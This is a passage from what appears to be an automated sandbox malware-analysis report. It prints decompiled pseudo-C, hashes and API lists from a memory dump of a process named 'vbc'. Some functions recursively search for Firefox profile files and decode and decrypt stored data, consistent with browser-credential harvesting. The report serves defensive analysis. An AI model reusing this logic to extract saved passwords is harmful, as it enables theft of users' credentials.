                                                                                                                                                                        • Instruction Fuzzy Hash: A801F9729001296BD720A259CC45FDB7B6C9F54304F0400FAB60DF3142D6B49A94CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004021E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E004021E0(void* __ecx, intOrPtr _a4, char* _a8) {
				void* __ebx;
				intOrPtr _t22;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t36;
				signed short _t42;
				char* _t47;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				void* _t57;

				_t22 = _a4;
				_t57 = _t22 - 6;
				_t47 = _a8;
				_t48 = __ecx;
				 *_t47 = 0;
				if(_t57 > 0) {
					_t23 = _t22 - 7;
					if(_t23 == 0) {
						return __ecx + 0x214;
					}
					_t25 = _t23 - 1;
					if(_t25 == 0) {
						return __ecx + 0x294;
					}
					_t27 = _t25 - 1;
					if(_t27 == 0) {
						return __ecx + 0x314;
					}
					_t29 = _t27 - 1;
					if(_t29 == 0) {
						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
						if(_t49 < 1 || _t49 > 7) {
							if(_t49 < 8 || _t49 > 0xe) {
								if(_t49 < 0xf || _t49 > 0x19) {
									if(_t49 < 0x1a || _t49 > 0x2d) {
										if(_t49 < 0x2e) {
											L16:
											return _t47;
										}
										_t42 = 0x519;
									} else {
										_t42 = 0x518;
									}
								} else {
									_t42 = 0x517;
								}
							} else {
								_t42 = 0x516;
							}
							goto L20;
						} else {
							_t42 = 0x515;
							L20:
							return E00407A69(_t42);
						}
					}
					_t32 = _t29 - 1;
					if(_t32 == 0) {
						return __ecx + 0x190;
					}
					if(_t32 != 1) {
						goto L16;
					}
					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
					L14:
					if(_t50 != 0) {
						_push(0xa);
						_push(_t47);
						_push(_t50);
						L0041203C();
					}
					goto L16;
				}
				if(_t57 == 0) {
					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
					goto L20;
				}
				if(_t22 == 0xfffffff6) {
					_t36 = E00407A69( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
					sprintf(_t47, "%s  %s  %s", E00407A69( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
					goto L16;
				}
				if(_t22 == 0) {
					return __ecx + 0xc;
				}
				if(_t22 == 1) {
					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
					goto L20;
				}
				if(_t22 == 2) {
					return __ecx + 0x90;
				}
				if(_t22 == 3) {
					return __ecx + 0x110;
				}
				if(_t22 == 4) {
					_t50 =  *((intOrPtr*)(__ecx + 0x394));
					goto L14;
				}
				if(_t22 != 5) {
					goto L16;
				}
				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
					_push(0x10);
				} else {
					_push(0xf);
				}
				_pop(_t42);
				goto L20;
			}

















                                                                                                                                                                        0x004021e0
                                                                                                                                                                        0x004021e4
                                                                                                                                                                        0x004021ea
                                                                                                                                                                        0x004021ee
                                                                                                                                                                        0x004021f0
                                                                                                                                                                        0x004021f3
                                                                                                                                                                        0x004022d1
                                                                                                                                                                        0x004022d4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402381
                                                                                                                                                                        0x004022da
                                                                                                                                                                        0x004022db
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402379
                                                                                                                                                                        0x004022e1
                                                                                                                                                                        0x004022e2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402371
                                                                                                                                                                        0x004022e8
                                                                                                                                                                        0x004022e9
                                                                                                                                                                        0x00402308
                                                                                                                                                                        0x00402311
                                                                                                                                                                        0x00402325
                                                                                                                                                                        0x00402339
                                                                                                                                                                        0x0040234d
                                                                                                                                                                        0x00402361
                                                                                                                                                                        0x0040224d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040224d
                                                                                                                                                                        0x00402367
                                                                                                                                                                        0x00402354
                                                                                                                                                                        0x00402354
                                                                                                                                                                        0x00402354
                                                                                                                                                                        0x00402340
                                                                                                                                                                        0x00402340
                                                                                                                                                                        0x00402340
                                                                                                                                                                        0x0040232c
                                                                                                                                                                        0x0040232c
                                                                                                                                                                        0x0040232c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402318
                                                                                                                                                                        0x00402318
                                                                                                                                                                        0x00402276
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402276
                                                                                                                                                                        0x00402311
                                                                                                                                                                        0x004022eb
                                                                                                                                                                        0x004022ec
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402300
                                                                                                                                                                        0x004022ef
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004022f5
                                                                                                                                                                        0x0040223d
                                                                                                                                                                        0x0040223f
                                                                                                                                                                        0x00402241
                                                                                                                                                                        0x00402243
                                                                                                                                                                        0x00402244
                                                                                                                                                                        0x00402245
                                                                                                                                                                        0x0040224a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040223f
                                                                                                                                                                        0x004021f9
                                                                                                                                                                        0x004022c9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004022c9
                                                                                                                                                                        0x00402202
                                                                                                                                                                        0x00402294
                                                                                                                                                                        0x004022b9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004022be
                                                                                                                                                                        0x0040220a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402280
                                                                                                                                                                        0x0040220f
                                                                                                                                                                        0x00402270
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402270
                                                                                                                                                                        0x00402214
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040225f
                                                                                                                                                                        0x00402219
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402254
                                                                                                                                                                        0x0040221e
                                                                                                                                                                        0x00402237
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402237
                                                                                                                                                                        0x00402223
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040222c
                                                                                                                                                                        0x00402233
                                                                                                                                                                        0x0040222e
                                                                                                                                                                        0x0040222e
                                                                                                                                                                        0x0040222e
                                                                                                                                                                        0x00402230
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _ultoasprintf
                                                                                                                                                                        • String ID: %s %s %s
                                                                                                                                                                        • API String ID: 432394123-3850900253
                                                                                                                                                                        • Opcode ID: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
                                                                                                                                                                        • Instruction ID: 4550bc8a79151648f87db51bd02682248f93ba3dc48fc4e36bbc9480066499b4
                                                                                                                                                                        • Opcode Fuzzy Hash: ad10a0a60f11ae5ad813c548426d3cbfbdd2c873bbe0414cf6ac4599a9575019
                                                                                                                                                                        • Instruction Fuzzy Hash: F741F731904B16C7CA34956487CCBEBA298E702304F6504BFDC5AF72D0D2FCAE46866B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040851B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040851B(intOrPtr* __esi, struct HWND__* _a4) {
				long _v12;
				int _v16;
				int _v20;
				int _v28;
				signed int _v32;
				int _v36;
				void* _v40;
				long _t16;
				intOrPtr _t22;
				void* _t24;
				signed int _t25;
				void* _t26;
				int _t27;
				intOrPtr* _t28;

				_t28 = __esi;
				if(_a4 == 0) {
					L12:
					return _t16;
				}
				_t22 =  *((intOrPtr*)(__esi + 4));
				_t26 = 0;
				_t24 = 0;
				if(_t22 <= 0) {
					L6:
					_t27 = 0;
					if(_t22 <= 0) {
						goto L12;
					} else {
						goto L7;
					}
					do {
						L7:
						_t16 =  *_t28 + _t27 * 4;
						_t25 =  *_t16 & 0x0000ffff;
						if(_t25 >= 0 && _t25 < 0x7d0) {
							_t16 =  *((short*)(_t16 + 2));
							if(_t16 < _t22) {
								_v12 = _t16;
								_v40 = 0x22;
								_v32 = _t25;
								_v36 = 0;
								_v28 = 0;
								_v20 = 0;
								_v16 = 0;
								_t16 = SendMessageA(_a4, 0x101a, _t27,  &_v40);
							}
						}
						_t22 =  *((intOrPtr*)(_t28 + 4));
						_t27 = _t27 + 1;
					} while (_t27 < _t22);
					goto L12;
				}
				_t16 =  *__esi + 2;
				do {
					if( *_t16 != 0) {
						goto L5;
					}
					_t26 = _t26 + 1;
					if(_t26 >= 2) {
						goto L12;
					}
					L5:
					_t24 = _t24 + 1;
					_t16 = _t16 + 4;
				} while (_t24 < _t22);
				goto L6;
			}

















                                                                                                                                                                        0x0040851b
                                                                                                                                                                        0x00408528
                                                                                                                                                                        0x004085a8
                                                                                                                                                                        0x004085a8
                                                                                                                                                                        0x004085a8
                                                                                                                                                                        0x0040852a
                                                                                                                                                                        0x0040852d
                                                                                                                                                                        0x0040852f
                                                                                                                                                                        0x00408533
                                                                                                                                                                        0x0040854c
                                                                                                                                                                        0x0040854c
                                                                                                                                                                        0x00408550
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408552
                                                                                                                                                                        0x00408552
                                                                                                                                                                        0x00408554
                                                                                                                                                                        0x00408557
                                                                                                                                                                        0x0040855d
                                                                                                                                                                        0x00408566
                                                                                                                                                                        0x0040856c
                                                                                                                                                                        0x0040856e
                                                                                                                                                                        0x00408581
                                                                                                                                                                        0x00408588
                                                                                                                                                                        0x0040858b
                                                                                                                                                                        0x0040858e
                                                                                                                                                                        0x00408591
                                                                                                                                                                        0x00408594
                                                                                                                                                                        0x00408597
                                                                                                                                                                        0x00408597
                                                                                                                                                                        0x0040856c
                                                                                                                                                                        0x0040859d
                                                                                                                                                                        0x004085a0
                                                                                                                                                                        0x004085a1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408552
                                                                                                                                                                        0x00408538
                                                                                                                                                                        0x00408539
                                                                                                                                                                        0x0040853c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040853e
                                                                                                                                                                        0x00408542
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408544
                                                                                                                                                                        0x00408544
                                                                                                                                                                        0x00408545
                                                                                                                                                                        0x00408548
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageA.USER32(?,0000101A,00000000,?), ref: 00408597
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID: "$\LA
                                                                                                                                                                        • API String ID: 3850602802-1791104459
                                                                                                                                                                        • Opcode ID: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
                                                                                                                                                                        • Instruction ID: ec77e5a748e9a6ff816ea2aa2a284b6bdb41b89871e7a2a93e67b2087f5a6bee
                                                                                                                                                                        • Opcode Fuzzy Hash: 6730269ec323a4575099126faff27654677e2dead0fd5bf6d10708e601ad3506
                                                                                                                                                                        • Instruction Fuzzy Hash: 52115171A00115AEDB149F9ACEC04BEB7F5FB98305B50843FD1D6E7680DB789982CB58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040D9D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                        			E0040D9D8(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				char _v1296;
				signed int _v1300;
				void* __esi;
				char* _t26;
				void* _t42;
				intOrPtr* _t44;

				_t42 = __edx;
				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t44 = __ecx;
				E00406FD2( &_v1300, __eflags, "*.*", _a4);
				while(E0040702D( &_v1300) != 0) {
					__eflags = E00406F97( &_v1300);
					if(__eflags == 0) {
						__eflags = _a8 - 1;
						if(_a8 > 1) {
							_t26 =  &_v928;
							_push("prefs.js");
							_push(_t26);
							L00412072();
							__eflags = _t26;
							if(_t26 == 0) {
								__eflags = E00406155( &_v652);
								if(__eflags != 0) {
									E0040D7C1(_t44, _t42, __eflags,  &_v652);
								}
							}
						}
					} else {
						_a8 = _a8 + 1;
						E0040D9D8(_t44, _t42, __eflags,  &_v652, _a8);
					}
				}
				E004070C5( &_v1300);
				return 1;
			}












                                                                                                                                                                        0x0040d9d8
                                                                                                                                                                        0x0040d9e4
                                                                                                                                                                        0x0040d9ef
                                                                                                                                                                        0x0040d9f3
                                                                                                                                                                        0x0040d9fa
                                                                                                                                                                        0x0040da0a
                                                                                                                                                                        0x0040da0c
                                                                                                                                                                        0x0040da76
                                                                                                                                                                        0x0040da1c
                                                                                                                                                                        0x0040da1e
                                                                                                                                                                        0x0040da37
                                                                                                                                                                        0x0040da3b
                                                                                                                                                                        0x0040da3d
                                                                                                                                                                        0x0040da44
                                                                                                                                                                        0x0040da49
                                                                                                                                                                        0x0040da4a
                                                                                                                                                                        0x0040da4f
                                                                                                                                                                        0x0040da53
                                                                                                                                                                        0x0040da62
                                                                                                                                                                        0x0040da65
                                                                                                                                                                        0x0040da71
                                                                                                                                                                        0x0040da71
                                                                                                                                                                        0x0040da65
                                                                                                                                                                        0x0040da53
                                                                                                                                                                        0x0040da20
                                                                                                                                                                        0x0040da20
                                                                                                                                                                        0x0040da30
                                                                                                                                                                        0x0040da30
                                                                                                                                                                        0x0040da1e
                                                                                                                                                                        0x0040da87
                                                                                                                                                                        0x0040da93

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strlen$FileFindFirst
                                                                                                                                                                        • String ID: *.*$prefs.js
                                                                                                                                                                        • API String ID: 2516927864-1592826420
                                                                                                                                                                        • Opcode ID: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
                                                                                                                                                                        • Instruction ID: 0a1894bf97bc7f37e7ea977f35cd1e9cdc16bb9bd7797736beedadfbd1967f85
                                                                                                                                                                        • Opcode Fuzzy Hash: 6a000196e6438ec39e637ca0eb5d4ae5762e5a1622c1bb359a3e97ee416ced3e
                                                                                                                                                                        • Instruction Fuzzy Hash: 1811947250C3465ED720EAA58C01ADB7BD89F55314F14863FF898E21C2D738D61DCB9A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004066AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004066AF(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				char* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v64 = _v64 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v56 = _t23;
				_v32 = _a8;
				_v20 = _a12;
				_v76 = _t34;
				_v80 = 0x4c;
				_v68 = _a4;
				_v52 = _t38;
				_v48 = 0x104;
				_v28 = 0x80806;
				if(GetSaveFileNameA( &_v80) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v56;
					}
					strcpy(_t38, _v52);
					return 1;
				}
			}



















                                                                                                                                                                        0x004066af
                                                                                                                                                                        0x004066af
                                                                                                                                                                        0x004066af
                                                                                                                                                                        0x004066b7
                                                                                                                                                                        0x004066ba
                                                                                                                                                                        0x004066bc
                                                                                                                                                                        0x004066bc
                                                                                                                                                                        0x004066be
                                                                                                                                                                        0x004066c2
                                                                                                                                                                        0x004066c6
                                                                                                                                                                        0x004066ca
                                                                                                                                                                        0x004066d0
                                                                                                                                                                        0x004066d6
                                                                                                                                                                        0x004066d9
                                                                                                                                                                        0x004066e3
                                                                                                                                                                        0x004066ea
                                                                                                                                                                        0x004066ed
                                                                                                                                                                        0x004066f0
                                                                                                                                                                        0x004066f7
                                                                                                                                                                        0x00406706
                                                                                                                                                                        0x00406724
                                                                                                                                                                        0x00406708
                                                                                                                                                                        0x0040670a
                                                                                                                                                                        0x0040670f
                                                                                                                                                                        0x0040670f
                                                                                                                                                                        0x00406715
                                                                                                                                                                        0x00406720
                                                                                                                                                                        0x00406720

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileNameSavestrcpy
                                                                                                                                                                        • String ID: L
                                                                                                                                                                        • API String ID: 1182090483-2909332022
                                                                                                                                                                        • Opcode ID: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
                                                                                                                                                                        • Instruction ID: d41a0f3581961b0f058ab7b38d8a0fc10f69f88ca1386dcb34cd33e007bc3755
                                                                                                                                                                        • Opcode Fuzzy Hash: 2aa07690fce79c473fa63c108ae99b2fccd51bdc1973966a0ba636b15db491df
                                                                                                                                                                        • Instruction Fuzzy Hash: D301E9B1D102099FDF10DFA9D8847AEBBF4BF08319F10442AE915E6340DB749955CF54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407D23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadMenuA.USER32 ref: 00407D2B
                                                                                                                                                                        • sprintf.MSVCRT ref: 00407D4E
                                                                                                                                                                          • Part of subcall function 00407BCE: GetMenuItemCount.USER32 ref: 00407BE4
                                                                                                                                                                          • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C08
                                                                                                                                                                          • Part of subcall function 00407BCE: GetMenuItemInfoA.USER32 ref: 00407C3E
                                                                                                                                                                          • Part of subcall function 00407BCE: memset.MSVCRT ref: 00407C6B
                                                                                                                                                                          • Part of subcall function 00407BCE: strchr.MSVCRT ref: 00407C77
                                                                                                                                                                          • Part of subcall function 00407BCE: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407CD2
                                                                                                                                                                          • Part of subcall function 00407BCE: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407CEE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                                                                                                                                        • String ID: menu_%d
                                                                                                                                                                        • API String ID: 3671758413-2417748251
                                                                                                                                                                        • Opcode ID: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
                                                                                                                                                                        • Instruction ID: 2770b7a066d609e077f5412e4a2b93c9a9718e974603bd13de201155b170d4e3
                                                                                                                                                                        • Opcode Fuzzy Hash: 49ac11d1195a608e742f3e6ca3ff2f5e26bbcd1b47ce44f2e641ce1c3c472826
                                                                                                                                                                        • Instruction Fuzzy Hash: 25D0C271A4911036CB2133366C0AFDB3C288BD2719F28406EF000650C1CABCA182827E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004084B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004084B2(char* __esi) {
				char* _t2;
				char* _t6;

				_t6 = __esi;
				E0040616A(__esi);
				_t2 = strrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 = 0;
				}
				return strcat(_t6, "_lng.ini");
			}





                                                                                                                                                                        0x004084b2
                                                                                                                                                                        0x004084b3
                                                                                                                                                                        0x004084bb
                                                                                                                                                                        0x004084c5
                                                                                                                                                                        0x004084c7
                                                                                                                                                                        0x004084c7
                                                                                                                                                                        0x004084d7

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040616A: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,004084B8,00000000,004083D6,?,00000000,00000104,?), ref: 00406175
                                                                                                                                                                        • strrchr.MSVCRT ref: 004084BB
                                                                                                                                                                        • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 004084D0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileModuleNamestrcatstrrchr
                                                                                                                                                                        • String ID: _lng.ini
                                                                                                                                                                        • API String ID: 3097366151-1948609170
                                                                                                                                                                        • Opcode ID: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
                                                                                                                                                                        • Instruction ID: 42c27a01d44ad3a484ea9941e8a753782f6a4a1a49f0a0828630b4f1254f47e7
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d253c9011988194c7ab29affedf6fb1a5ea8153034ac82cdf8f1fb697810a88
                                                                                                                                                                        • Instruction Fuzzy Hash: 98C0126924565024D12621215E03B8A09494F26319F24416BF501781C3EE9C46E1806E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407570 Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                        			E00407570(char* __eax, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				int _v12;
				char* _v16;
				char _v20;
				signed int* _v24;
				char _v28;
				void _v284;
				char _v540;
				char _v1068;
				void _v3115;
				char _v3116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				signed int _t40;
				signed int* _t61;
				char _t69;
				char* _t74;
				char* _t75;
				intOrPtr* _t76;
				signed int _t78;
				int _t80;
				void* _t83;
				void* _t84;
				signed int _t89;

				_t74 = __eax;
				_t35 = strlen(__eax);
				_t78 = _t35;
				_t36 = _t35 & 0x80000001;
				if(_t36 < 0) {
					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
					_t89 = _t36;
				}
				if(_t89 != 0 || _t78 <= 0x20) {
					return _t36;
				} else {
					_v3116 = 0;
					memset( &_v3115, 0, 0x7ff);
					_v8 = _v8 & 0x00000000;
					_t61 = _a4 + 4;
					_t40 =  *_t61 | 0x00000001;
					if(_t78 <= 4) {
						L7:
						_t79 =  &_v1068;
						E004046E1( &_v1068);
						if(E004047AA( &_v1068, _t93) != 0) {
							_v20 = _v8;
							_v16 =  &_v3116;
							_v28 = 0x10;
							_v24 = _t61;
							if(E0040481B(_t79,  &_v20,  &_v28,  &_v12) != 0) {
								_t80 = _v12;
								if(_t80 > 0xff) {
									_t80 = 0xff;
								}
								_v540 = 0;
								_v284 = 0;
								memcpy( &_v284, _v8, _t80);
								_t75 =  &_v540;
								 *((char*)(_t84 + _t80 - 0x118)) = 0;
								E004060DA(0xff, _t75, _a8);
								 *((intOrPtr*)( *_a4))(_t75);
								LocalFree(_v8);
							}
						}
						return E004047FB( &_v1068);
					}
					_t76 = _t74 + 5;
					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
					do {
						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
						_t40 = _t40 * 0x10ff5;
						_t76 = _t76 + 2;
						_v8 = _v8 + 1;
						_t83 = _t83 - 1;
						_t93 = _t83;
						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
					} while (_t83 != 0);
					goto L7;
				}
			}






























                                                                                                                                                                        0x0040757c
                                                                                                                                                                        0x0040757f
                                                                                                                                                                        0x00407584
                                                                                                                                                                        0x00407586
                                                                                                                                                                        0x0040758c
                                                                                                                                                                        0x00407592
                                                                                                                                                                        0x00407592
                                                                                                                                                                        0x00407592
                                                                                                                                                                        0x00407593
                                                                                                                                                                        0x004076b4
                                                                                                                                                                        0x004075a2
                                                                                                                                                                        0x004075b0
                                                                                                                                                                        0x004075b7
                                                                                                                                                                        0x004075bf
                                                                                                                                                                        0x004075c3
                                                                                                                                                                        0x004075cb
                                                                                                                                                                        0x004075d1
                                                                                                                                                                        0x00407605
                                                                                                                                                                        0x00407605
                                                                                                                                                                        0x0040760b
                                                                                                                                                                        0x00407617
                                                                                                                                                                        0x00407620
                                                                                                                                                                        0x00407629
                                                                                                                                                                        0x0040763a
                                                                                                                                                                        0x00407641
                                                                                                                                                                        0x0040764b
                                                                                                                                                                        0x0040764d
                                                                                                                                                                        0x00407657
                                                                                                                                                                        0x00407659
                                                                                                                                                                        0x00407659
                                                                                                                                                                        0x00407666
                                                                                                                                                                        0x0040766d
                                                                                                                                                                        0x00407674
                                                                                                                                                                        0x0040767c
                                                                                                                                                                        0x00407682
                                                                                                                                                                        0x0040768a
                                                                                                                                                                        0x0040769a
                                                                                                                                                                        0x0040769f
                                                                                                                                                                        0x0040769f
                                                                                                                                                                        0x0040764b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004076ab
                                                                                                                                                                        0x004075d8
                                                                                                                                                                        0x004075db
                                                                                                                                                                        0x004075dc
                                                                                                                                                                        0x004075ee
                                                                                                                                                                        0x004075f0
                                                                                                                                                                        0x004075f7
                                                                                                                                                                        0x004075f8
                                                                                                                                                                        0x004075fb
                                                                                                                                                                        0x004075fb
                                                                                                                                                                        0x004075fc
                                                                                                                                                                        0x004075fc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004075dc

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                        • String ID:
